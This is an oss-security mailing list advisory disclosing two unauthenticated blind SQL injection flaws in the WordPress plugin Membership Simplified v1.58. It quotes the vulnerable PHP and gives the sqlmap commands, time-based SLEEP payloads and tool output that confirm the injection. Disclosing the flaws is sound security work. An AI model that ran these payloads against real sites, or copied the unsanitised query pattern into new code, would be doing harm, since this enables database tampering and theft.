'[oss-security] Multiple Unauthenticated blind SQL injections in Wordpress Plugin Membership Simplifi'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Multiple Unauthenticated blind SQL injections in Wordpress Plugin Membership Simplifi
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2017-03-22 10:59:33
Message-ID: BFF5A561-72DD-4395-B558-F4DDBB8AB751 () me ! com
[Download RAW message or body]

Title: Multiple Unauthenticated blind SQL injections in Wordpress Plugin Membership Simplified \
                v1.58
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-17
CVE-ID:[CVE-2017-1002009][CVE-2017-1002010]
Download Site: http://membership.officeautopilot.com/get-it-now/
Vendor: http://membership.officeautopilot.com/
Vendor Notified: 2017-03-17
Vendor Contact: http://membership.officeautopilot.com/1-58-has-been-released-and-works-with-version-4-5-of-wordpress/#comment-484
                
Advisory: http://www.vapidlabs.com/advisory.php?v=188
Description: Membership Simplified allows you to generate membership lessons with templated \
content to create a unified look and feel throughout your courses. Vulnerability:
The code in membership-simplified-for-oap-members-only/updateDB.php is vulnerable to blind SQL \
injection because it doesn't sanitize user input via any of the POST requests being passed into \
the SQL query.  Also it doesn't check that a user is authorized to make updates to the \
database.

  2 require_once("../../../wp-config.php");
  3 global $wpdb;
  4 $table_name = $wpdb->prefix . "download_listing";
  5 $media_table_name = $wpdb->prefix . "media_listing";
  6 $action = $_POST['action'];
  7 $updateRecordsArray = $_POST['recordsArray'];
  8 $mediaupdateRecordsArray = $_POST['mediaRecordsArray'];

CVE-2017-1002009:
I chose to test the SQL injection against the delete action as it was the most straightforward \
injection point.

 34 if($action == 'delete') {
 35         $upload_base_dir = wp_upload_dir();
 36         $upload_dir =  $upload_base_dir['basedir'];
 37         $path= $upload_dir.'/membership-simplified-for-oap-members-only/';
 38         $fileName = $wpdb->get_row("select fileName from $table_name where recordId= \
".$_POST['recordId']."");  39         @unlink($path.$fileName->fileName);
 40         $query= "delete from $table_name where recordId= '".$_POST['recordId']."' ";
 41         $wpdb->query($query) or die('Error, insert query failed');
 42 
 43 }

CVE-2017-1002010:

 56 if($action == 'delete_media') {
 57         $upload_base_dir = wp_upload_dir();
 58         $upload_dir = $upload_base_dir['basedir'];
 59         $path = $upload_dir.'/membership-simplified-for-oap-members-only/';
 60         $fileName = $wpdb->get_row("select fileName from $media_table_name where recordId= \
".$_POST['recordId']."");  61         //@unlink($path.$fileName->fileName);
 62         $query= "delete from $media_table_name where recordId= '".$_POST['recordID']."' ";
 65         $wpdb->query($query) or die($query);

Exploit Code:
	• $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' \
--data 'action=delete&recordId=*' --dbms mysql  --level 3 --risk 3  •  
	• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if \
any)? [y/N]   • sqlmap identified the following injection point(s) with a total of 1411 \
HTTP(s) requests:  • ---
	• Parameter: #1* ((custom) POST)
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
	•     Payload: action=delete&recordId=(SELECT * FROM (SELECT(SLEEP(5)))uxVZ)
	• ---
	• [02:10:51] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [02:10:51] [INFO] fetched data logged to text files under \
'/home/larry/.sqlmap/output/example.com'  •  
	• [*] shutting down at 02:10:51
	•  
	•  
	• $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' \
--data 'action=delete_media&recordId=*' --dbms mysql  --level 3 --risk 3  •  
	• sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests:
	• ---
	• Parameter: #1* ((custom) POST)
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
	•     Payload: action=delete_media&recordId=(SELECT * FROM (SELECT(SLEEP(5)))ENgw)
	• ---
	• [02:34:49] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [02:34:49] [INFO] fetched data logged to text files under \
'/home/larry/.sqlmap/output/example.com'  •  
	• [*] shutting down at 02:34:49=


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic